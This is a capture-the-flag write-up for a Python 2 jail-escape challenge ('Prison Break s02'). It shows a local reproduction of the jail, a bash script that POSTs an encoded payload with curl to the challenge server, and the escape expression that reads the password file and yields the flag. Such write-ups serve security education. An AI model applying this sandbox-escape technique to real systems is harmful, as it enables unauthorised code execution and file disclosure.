# 0x3004 CTF - Prison Break s02


# python
>>> list(vars())
['__builtins__', '__name__', '__doc__', '__package__']
>>> [newvar for newvar in list(vars())]
['__builtins__', '__name__', '__doc__', '__package__']
>>> [list(vars()) for newvar in [0]][0]
['__builtins__', '__name__', 'newvar', '__doc__', '__package__']

# cat pyjail.py
# Local reproduction (Python 2) of the challenge's jail preamble. It is used to
# find out at which position a list-comprehension loop variable shows up in
# list(vars()) once the same global names as on the server are defined.

# Empty sys.modules and drop the local reference to it, as the challenge does.
from sys import modules
modules.clear()
del modules

# The "jail": dir is overwritten on the builtins module itself, while eval,
# input and execfile are only rebound to None as names in this module.
# NOTE(review): this is a denylist of four names. Everything not listed
# (open, max, list, vars, ...) stays callable, and that is what the submitted
# expression relies on. Hiding names is not an isolation boundary; code
# evaluating untrusted input needs an allowlist-based parser or OS-level
# isolation instead.
__builtins__.dir = None
eval = None
input = None
execfile = None

# Placeholder so that the LEN_PASS global exists, as it does in the challenge
# source at the moment the submitted expression is evaluated.
LEN_PASS = None
# In Python 2 a list comprehension's loop variable is bound in the enclosing
# scope, so 'password' appears in vars() while the comprehension body runs.
print [list(vars()) for password in [0]]
# Position of that name in the listing.
# NOTE(review): the index comes from the interpreter's dict ordering for this
# exact set of global names; adding or renaming a global may change it.
print [list(vars()).index('password') for password in [0]]

# python pyjail.py
[['LEN_PASS', '__builtins__', '__file__', 'execfile', '__package__', 'eval', 'input', '__name__', 'password', '__doc__']]
[8]

# cat prison_break_s02.sh
#!/bin/bash

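# Percent-encode every byte of $1 as %XX (lowercase hex), e.g. "ab" -> "%61%62".
function encode {
    # printf '%s' instead of `echo -n`: echo would interpret an argument such
    # as "-n" or "-e" as an option and encode nothing (or the wrong bytes).
    # xxd -p wraps its hex dump, so the newlines are stripped before sed
    # prefixes each two-digit pair with '%'.
    printf '%s' "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}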

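# Expression to submit, taken verbatim from the first command-line argument.
escape="$1"
# Quote the expansion: the expression contains '[' and ']', which the shell
# treats as glob bracket patterns. Unquoted, $escape could be word-split or
# replaced by a matching file name from the current directory before it is
# encoded. $(...) replaces the legacy backtick form.
password=$(encode "$escape")

# POST the percent-encoded expression as the `code` form field. The field is
# quoted so it always reaches curl as a single argument.
curl --silent --request POST --data "code=$password" 'http://challenges.wargame.vn:50006/go'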

# ./prison_break_s02.sh "[max(open(list(vars())[8]))for(password)in[0]][0]"
<html><title>Prison Break s02</title><style>body{background:#000;}</style><body>

    from sys import modules
    modules.clear()
    del modules

    __builtins__.dir = None
    eval = None
    input = None
    execfile = None

    LEN_PASS = len(open('./password','r').read()) # Length of Password
    
    I_N_P_U_T = ( <strong style='color:Green;'>[max(open(list(vars())[8]))for(password)in[0]][0]</strong> ) # only a-z0-9[]() and length of code must be <= 50
    
    P_A_S_S_W_O_R_D = open('./password','r').read()

    assert LEN_PASS >= 1
    assert LEN_PASS == len(I_N_P_U_T)
    for i in range(LEN_PASS):
     if I_N_P_U_T[i] != P_A_S_S_W_O_R_D[i]:
      from sys import exit
      exit()

    # FLAGGGGGGGGGGGGGGGGGGGGGGGG
    print 'Here is your flag:',open('./flag','r').read()
    -----------------------------------------------------
    
    <strong style='color:White;'>Here is your flag: 0x3004{final_stage_prison_break_1337}

</strong>
</pre></html>

References

http://blog.natusvincere.org/2014/05/03/0x3004-ctf-prison-break-s02-pwn300/
